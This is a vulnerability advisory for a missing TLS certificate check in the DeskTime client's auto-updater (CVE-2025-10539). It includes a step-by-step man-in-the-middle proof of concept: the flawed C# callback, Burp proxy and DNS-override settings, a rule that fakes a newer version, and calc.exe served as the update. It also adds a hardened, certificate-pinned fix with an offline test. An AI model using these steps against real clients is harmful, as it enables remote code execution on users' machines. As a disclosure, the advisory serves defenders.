# Vulnerability summary: Missing TLS Certificate Validation leading to RCE (CVE-2025-10539)

## Overview

**CVE-2025-10539**: Because the DeskTime client does not properly validate the TLS certificate of its update server, an attacker positioned on the network path between the client and the DeskTime update server can answer the update request with a malicious executable and obtain user-level code execution on the client (RCE).

## Scope

- **Affected version**: 1.3.671 (the latest version at the time of testing)
- **Trigger**: the updater runs automatically every hour; no user interaction is required

## Fix

- **Fixed version**: v1.3.674
- **Release date**: 2026-04-28
- **Download**: https://desktime.com/download

## Proof of Concept (PoC)

### 1. Certificate validation snippet

The callback below is the client's certificate check. A chain whose only reported problem is an untrusted root (that is, any self-signed certificate, including one minted on the fly by an interception proxy for `desktime.com`) is accepted, so the chain check is effectively disabled. The snippet is reproduced as found; only the enum name, which was garbled in the original, has been corrected to `X509ChainStatusFlags`.

```csharp
using System.Net.Security;
using System.Security.Cryptography.X509Certificates;

// Certificate validation (vulnerable as shipped in 1.3.671)
private bool CheckCertificate(object sender, X509Certificate certificate,
                              X509Chain chain, SslPolicyErrors sslPolicyErrors)
{
    if (sslPolicyErrors == SslPolicyErrors.None)
        return true;

    if (sslPolicyErrors == SslPolicyErrors.RemoteCertificateChainErrors)
    {
        // Bug: a chain whose sole status is UntrustedRoot is trusted outright.
        // Any self-signed certificate for the right hostname passes this branch,
        // which is exactly what an on-path proxy such as Burp presents.
        if (chain.ChainStatus.Length == 1 &&
            chain.ChainStatus[0].Status == X509ChainStatusFlags.UntrustedRoot)
            return true;
    }

    return false;
}
```

### 2. Burp Suite proxy listener

```
Redirect to host: desktime.com
Redirect to port: 443
☑ Force use of TLS
☑ Support invisible proxying (enable only if needed)
```

### 3. DNS override

```
Hostname: desktime.com
IP Address: 127.0.0.1
```

The override has to affect the *client's* name resolution (so that the updater connects to the listener on 127.0.0.1), not Burp's own upstream resolution; otherwise the listener would redirect `desktime.com` back to itself instead of to the real update server.

### 4. Update request (as sent by the client)

```http
GET /api/v1/updates?version=1.3.671&os=windows&arch=x64&user_id=xxx HTTP/1.1
Host: desktime.com
Accept-Encoding: gzip, deflate, br
Connection: Close
```

### 5. Update response (as the client expects it when an update is available)

```json
{
  "version": "1.3.674",
  "url": "https://desktime.com/updates/win/update.exe"
}
```

### 6. Burp match-and-replace rule

```
Match:   "version":"1.3.671"
Replace: "version":"1.3.674"
```

The rule is applied to the response body. Because the client is already on 1.3.671, the live server reports that same version and the client sees nothing to install; rewriting the field makes it believe a newer build exists and fetch the `url`. The match string must be byte-exact against the raw body as served (the compact form above), not the pretty-printed example in step 5.

### 7. Malicious update file

Serve `calc.exe` in place of the update binary at the advertised `url`. Since the download goes through the same intercepted host, it is delivered by the proxy as well, and the client executes it on its next automatic update check without any user interaction.
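The following is an added example and not DeskTime's code: it places the vulnerable callback from section 1 next to a hardened replacement, wires the hardened one into an `HttpClient`, and reproduces offline the condition the proxy setup in sections 2 to 7 creates, namely a self-signed certificate for the update host. It assumes .NET 5 or later; the class name `UpdaterTls`, the helper `CreateUpdateClient` and the pinned value `ExpectedSpkiHash` are illustrative placeholders, not names from the product.

```csharp
// Added example, not DeskTime's code. Targets .NET 5+.
using System;
using System.Net.Http;
using System.Net.Security;
using System.Security.Cryptography;
using System.Security.Cryptography.X509Certificates;

static class UpdaterTls
{
    // Vulnerable: the same logic as the advisory's snippet. A chain whose only
    // problem is an untrusted root (any self-signed certificate, such as the one
    // Burp's CA issues for desktime.com) is accepted.
    public static bool VulnerableCheck(object sender, X509Certificate certificate,
                                       X509Chain chain, SslPolicyErrors sslPolicyErrors)
    {
        if (sslPolicyErrors == SslPolicyErrors.None) return true;
        if (sslPolicyErrors == SslPolicyErrors.RemoteCertificateChainErrors)
        {
            if (chain.ChainStatus.Length == 1 &&
                chain.ChainStatus[0].Status == X509ChainStatusFlags.UntrustedRoot)
                return true;
        }
        return false;
    }

    // Hardened: accept only a certificate that (a) chains to a trusted root with
    // no policy error at all and (b) carries the SPKI hash the updater was built
    // with. The pinned value below is an assumed placeholder; a real build embeds
    // the SHA-256 of the update server's (or its CA's) SubjectPublicKeyInfo.
    public const string ExpectedSpkiHash = "REPLACE-WITH-SHA256-OF-SERVER-SPKI";

    public static bool HardenedCheck(object sender, X509Certificate certificate,
                                     X509Chain chain, SslPolicyErrors sslPolicyErrors)
    {
        if (sslPolicyErrors != SslPolicyErrors.None || certificate == null) return false;
        using var leaf = new X509Certificate2(certificate);
        return string.Equals(SpkiSha256(leaf), ExpectedSpkiHash,
                             StringComparison.OrdinalIgnoreCase);
    }

    public static string SpkiSha256(X509Certificate2 cert)
    {
        byte[] spki = cert.PublicKey.ExportSubjectPublicKeyInfo();
        return Convert.ToHexString(SHA256.HashData(spki));
    }

    // How the updater's HttpClient should be constructed (assumed helper name).
    public static HttpClient CreateUpdateClient()
    {
        var handler = new HttpClientHandler
        {
            ServerCertificateCustomValidationCallback =
                (request, cert, chain, errors) => HardenedCheck(request, cert, chain, errors)
        };
        return new HttpClient(handler);
    }

    // Offline reproduction of the MITM condition: mint a self-signed certificate
    // for the update host (what an interception proxy presents), build its chain
    // the way SslStream does, and feed both callbacks the resulting policy errors.
    static void Main()
    {
        using RSA key = RSA.Create(2048);
        var request = new CertificateRequest("CN=desktime.com", key,
                                             HashAlgorithmName.SHA256, RSASignaturePadding.Pkcs1);
        var san = new SubjectAlternativeNameBuilder();
        san.AddDnsName("desktime.com");
        request.CertificateExtensions.Add(san.Build());
        using X509Certificate2 proxyCert = request.CreateSelfSigned(
            DateTimeOffset.UtcNow.AddDays(-1), DateTimeOffset.UtcNow.AddDays(30));

        using var chain = new X509Chain();
        chain.ChainPolicy.RevocationMode = X509RevocationMode.NoCheck;
        bool chainOk = chain.Build(proxyCert);
        // The hostname matches, so the only error SslStream would report is the chain error.
        SslPolicyErrors errors = chainOk
            ? SslPolicyErrors.None
            : SslPolicyErrors.RemoteCertificateChainErrors;

        Console.WriteLine("chain status: " +
            string.Join(",", Array.ConvertAll(chain.ChainStatus, s => s.Status)));
        Console.WriteLine("vulnerable callback accepts proxy cert: " +
            VulnerableCheck(null, proxyCert, chain, errors));
        Console.WriteLine("hardened callback accepts proxy cert:   " +
            HardenedCheck(null, proxyCert, chain, errors));
    }
}
```

Run it with `dotnet run`: the self-signed certificate fails chain building with `UntrustedRoot`, the vulnerable callback still returns `true`, and the hardened one returns `false`. The pin is what makes the fix robust against a compromised or mis-issued public CA as well; if pinning is not acceptable operationally, the minimum correct change is `return sslPolicyErrors == SslPolicyErrors.None;` with no special case for chain errors.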